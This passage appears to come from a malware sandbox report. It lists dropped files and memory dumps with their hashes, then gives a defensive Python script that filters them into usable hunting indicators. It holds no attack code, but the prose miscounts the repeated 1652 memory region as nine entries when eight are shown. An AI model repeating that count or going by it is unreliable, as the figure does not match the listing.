  SHA256  42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
  SHA512  9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

• C:\Users\Admin\AppData\Local\Temp\tmpF00C.tmp.dat
  Filesize 160KB
  MD5     f310cf1ff562ae14449e0167a3e1fe46
  SHA1    85c58afa9049467031c6c2b17f5c12ca73bb2788
  SHA256  e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
  SHA512  1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

• C:\Users\Admin\AppData\Local\c917b216abaf569d685c45bec60a2182\Admin@ZTSLLRFH_en-US\System\Process.txt
  Filesize 2KB
  MD5     d1c4e45698b4ba3f67cf12b105793e5b
  SHA1    01aecc0c7817dcc8deef463a9b3af183f65fe228
  SHA256  065f41347244709480ae4375320d309d8415237a31711e1d5b1a5dc2df9558d5
  SHA512  85be0f701e88e0c330e2354ff929f80175f13111f5816a06902143c104d74bf7335d914f3321eb9e13e962a6cfbac50f328e52e0771919346c751de85d279841

• C:\Users\Admin\AppData\Local\c917b216abaf569d685c45bec60a2182\Admin@ZTSLLRFH_en-US\System\Process.txt
  Filesize 4KB
  MD5     3ed374dc896ac350f133a1c5cfd5e874
  SHA1    1053438fa8371874f7090cded468ffb618bde645
  SHA256  9b8a0c1083c4e38f665bedd39a2ffc7ca75ceebd455e6a0b74a1a32cb06a5ad8
  SHA512  b60588a62887adc876c67433610e8c834605e3d8e8fd4c6a46a99b383458e06f9df3c457abc2c64eda861aba080fbac107667bf478b23fb1d8e124df6a8b88ce

• C:\Users\Admin\AppData\Local\c917b216abaf569d685c45bec60a2182\msgid.dat
  Filesize 1B
  MD5     cfcd208495d565ef66e7dff9f98764da
  SHA1    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
  SHA256  5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
  SHA512  31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

• C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
  Filesize 8B
  MD5     cf759e4c5f14fe3eec41b87ed756cea8
  SHA1    c27c796bb3c2fac929359563676f4ba1ffada1f5
  SHA256  c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
  SHA512  c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

• C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
  Filesize 7B
  MD5     bc41fb49b1af319050de60bf64fbfe0e
  SHA1    047a7782d5247bb5c481984635ccad8750dfbea6
  SHA256  57d7e8a4f9d97548f96a56cb0cb8cbebe88cffbe3f44264abb4eb522f6ea899a
  SHA512  5702638642378b3d49617e7ba8e586abdb0f86a79441842af208fb0acb2e532a7c00792f3034d2d01f485931f4adcb532b605763608cb9ff2a12df6d05a57bc7

• memory/748-21-0x00000000028E0000-0x00000000028E1000-memory.dmp  Filesize 4KB
• memory/952-20-0x0000000005E80000-0x0000000006424000-memory.dmp  Filesize 5.6MB
• memory/952-19-0x0000000005660000-0x00000000056FC000-memory.dmp  Filesize 624KB
• memory/952-17-0x0000000000400000-0x0000000000410000-memory.dmp  Filesize 64KB
• memory/952-18-0x00000000055C0000-0x0000000005652000-memory.dmp  Filesize 584KB
• memory/1652-0-0x00007FF8978D3000-0x00007FF8978D5000-memory.dmp  Filesize 8KB
• memory/1652-15-0x0000000000970000-0x0000000000990000-memory.dmp  Filesize 128KB
• memory/1652-794-0x00007FF8978D0000-0x00007FF898391000-memory.dmp  Filesize 10.8MB
• memory/1652-1-0x0000000000260000-0x0000000000278000-memory.dmp  Filesize 96KB
• memory/1652-3-0x00007FF8978D0000-0x00007FF898391000-memory.dmp  Filesize 10.8MB
• memory/1652-4-0x00007FF8978D3000-0x00007FF8978D5000-memory.dmp  Filesize 8KB
• memory/1652-200-0x0000000002530000-0x000000000253E000-memory.dmp  Filesize 56KB
• memory/1652-493-0x000000001B5F0000-0x000000001B5FE000-memory.dmp  Filesize 56KB
• memory/1652-494-0x000000001CA60000-0x000000001CB82000-memory.dmp  Filesize 1.1MB
• memory/1652-495-0x000000001C540000-0x000000001C54C000-memory.dmp  Filesize 48KB
• memory/1652-195-0x00000000009D0000-0x00000000009EC000-memory.dmp  Filesize 112KB
• memory/1652-196-0x00000000023B0000-0x00000000023C0000-memory.dmp  Filesize 64KB
• memory/1652-536-0x000000001C960000-0x000000001C982000-memory.dmp  Filesize 136KB
• memory/1652-540-0x000000001CD80000-0x000000001CEB4000-memory.dmp  Filesize 1.2MB
• memory/1652-541-0x000000001C550000-0x000000001C55A000-memory.dmp  Filesize 40KB
• memory/1652-199-0x000000001B550000-0x000000001B5B6000-memory.dmp  Filesize 408KB
• memory/1652-5-0x00007FF8978D0000-0x00007FF898391000-memory.dmp  Filesize 10.8MB
• memory/1652-14-0x00000000009F0000-0x0000000000A66000-memory.dmp  Filesize 472KB
• memory/1652-16-0x00000000009B0000-0x00000000009CE000-memory.dmp  Filesize 120KB
• memory/1652-13-0x00007FF8978D0000-0x00007FF898391000-memory.dmp  Filesize 10.8MB
• memory/1652-12-0x00007FF8978D0000-0x00007FF898391000-memory.dmp  Filesize 10.8MB
• memory/1652-11-0x00007FF8978D0000-0x00007FF898391000-memory.dmp  Filesize 10.8MB
• memory/1652-692-0x000000001C990000-0x000000001CA0A000-memory.dmp  Filesize 488KB
• memory/1652-735-0x000000001CB80000-0x000000001CC04000-memory.dmp  Filesize 528KB
• memory/1652-9-0x00007FF8978D0000-0x00007FF898391000-memory.dmp  Filesize 10.8MB
• memory/1652-743-0x000000001CA10000-0x000000001CA1E000-memory.dmp  Filesize 56KB
• memory/1652-744-0x000000001CA50000-0x000000001CA5A000-memory.dmp  Filesize 40KB
• memory/1652-8-0x00007FF8978D0000-0x00007FF898391000-memory.dmp  Filesize 10.8MB
• memory/4924-59-0x0000023CBDC20000-0x0000023CBDC40000-memory.dmp  Filesize 128KB
• memory/4924-23-0x0000023CBC840000-0x0000023CBC940000-memory.dmp  Filesize 1024KB
• memory/4924-24-0x0000023CBC840000-0x0000023CBC940000-memory.dmp  Filesize 1024KB
• memory/4924-28-0x0000023CBD860000-0x0000023CBD880000-memory.dmp  Filesize 128KB
• memory/4924-44-0x0000023CBD820000-0x0000023CBD840000-memory.dmp  Filesize 128KB
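The listing above is a flat run of Label/value pairs, and two things about it trip up people who paste it straight into a hunting feed: the memory dumps repeat the same region many times (the 1652 region 0x00007FF8978D0000-0x00007FF898391000 appears nine times), and the tiny dropped files are content-trivial, so their digests are not usable indicators. msgid.dat is one byte, and its MD5, SHA1 and SHA256 are exactly those of the ASCII character "0", which any file holding that byte shares. The script below is an added example, not tria.ge's own tooling or data model: it parses a constructed excerpt of this listing (values copied from the report, layout mirroring the page), keeps only hashes of files above a size floor (the 64-byte floor is an arbitrary choice), collapses the memory dumps into unique regions and checks the listed Filesize against end minus start, and brute-forces the content of the 1-byte file to show why its hashes are worthless as IOCs. The size-rendering rule (whole KB up to 1024KB, one-decimal MB above) is inferred from the listing, not documented behaviour.

```python
# Added example: parse a tria.ge dropped-file / memory-dump listing into hunting data.
import hashlib
import re
from collections import defaultdict

# Constructed excerpt of the listing above: values copied from the report, the
# Label/value layout mirrors the extracted page. Not tria.ge's own data model.
REPORT = r"""
• C:\Users\Admin\AppData\Local\Temp\tmpF00B.tmp.dat
Filesize
40KB
SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
• C:\Users\Admin\AppData\Local\c917b216abaf569d685c45bec60a2182\Admin@ZTSLLRFH_en-US\System\Process.txt
Filesize
2KB
SHA256
065f41347244709480ae4375320d309d8415237a31711e1d5b1a5dc2df9558d5
• C:\Users\Admin\AppData\Local\c917b216abaf569d685c45bec60a2182\msgid.dat
Filesize
1B
MD5
cfcd208495d565ef66e7dff9f98764da
SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
• memory/1652-3-0x00007FF8978D0000-0x00007FF898391000-memory.dmp
Filesize
10.8MB
• memory/1652-5-0x00007FF8978D0000-0x00007FF898391000-memory.dmp
Filesize
10.8MB
• memory/952-17-0x0000000000400000-0x0000000000410000-memory.dmp
Filesize
64KB
"""

LABELS = {"Filesize", "MD5", "SHA1", "SHA256", "SHA512"}
MEM_RE = re.compile(r"memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2}

def parse_size(text):
    """'10.8MB' -> bytes; the listing uses 1024-based units (64KB == 0x10000)."""
    m = re.fullmatch(r"([\d.]+)([KM]?B)", text.strip())
    if not m:
        raise ValueError(f"unparseable size: {text!r}")
    return int(float(m.group(1)) * UNITS[m.group(2)])

def format_size(n):
    """Render bytes the way the listing does (inferred from the page, not
    documented): whole KB up to and including 1024KB, one-decimal MB above."""
    return f"{n // 1024}KB" if n <= 1024 ** 2 else f"{n / 1024 ** 2:.1f}MB"

def parse_report(text):
    """One dict per bullet record; each Label line is followed by its value line."""
    records, current, label = [], None, None
    for line in (ln.strip() for ln in text.splitlines() if ln.strip()):
        if line.startswith("•"):
            current = {"path": line[1:].strip()}
            records.append(current)
            label = None
        elif current is not None and line in LABELS:
            label = line
        elif current is not None and label is not None:
            current[label] = line
            label = None
    return records

def hunting_hashes(records, min_bytes=64):
    """SHA256s worth hunting on: dropped files only, and only those large enough
    that the digest is not content-trivial (1- and 8-byte files match countless
    benign files). The 64-byte floor is an arbitrary choice for this example."""
    return {r["SHA256"] for r in records
            if "SHA256" in r and not r["path"].startswith("memory/")
            and parse_size(r["Filesize"]) >= min_bytes}

def memory_regions(records):
    """Collapse repeated dumps of one region into (pid, start, end) entries and
    check that the listed Filesize is the rendering of end - start."""
    regions = defaultdict(lambda: {"dumps": 0, "size": 0, "size_ok": True})
    for r in records:
        m = MEM_RE.match(r["path"])
        if not m:
            continue
        start, end = int(m.group(2), 16), int(m.group(3), 16)
        entry = regions[(int(m.group(1)), start, end)]
        entry["dumps"] += 1
        entry["size"] = end - start
        entry["size_ok"] = entry["size_ok"] and format_size(end - start) == r["Filesize"]
    return dict(regions)

def recover_tiny_content(record):
    """For a 1-byte file, brute-force the byte whose digests match every listed
    hash; shows why such hashes are useless as IOCs (the content is guessable)."""
    if parse_size(record["Filesize"]) != 1:
        return None
    wanted = {k.lower(): record[k].lower() for k in ("MD5", "SHA1", "SHA256") if k in record}
    for b in range(256):
        data = bytes([b])
        if wanted and all(hashlib.new(alg, data).hexdigest() == h for alg, h in wanted.items()):
            return data
    return None

if __name__ == "__main__":
    recs = parse_report(REPORT)
    print("hunt on:", sorted(hunting_hashes(recs)))
    for (pid, start, end), info in memory_regions(recs).items():
        print(f"pid {pid} {start:#x}-{end:#x} {format_size(info['size'])} x{info['dumps']} ok={info['size_ok']}")
    msgid = next(r for r in recs if r["path"].endswith("msgid.dat"))
    print("msgid.dat content:", recover_tiny_content(msgid))
```

Run against the full listing, the same parser leaves you with the two Process.txt digests and the two tmp*.dat digests as file indicators (the 7- and 8-byte DataLogs.conf entries drop out with msgid.dat), and with one entry per (pid, region) for the memory dumps; the 1024-based size check is what tells you that the 10.8MB rendering is the 0xAC1000-byte region and not a separately sized artifact.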
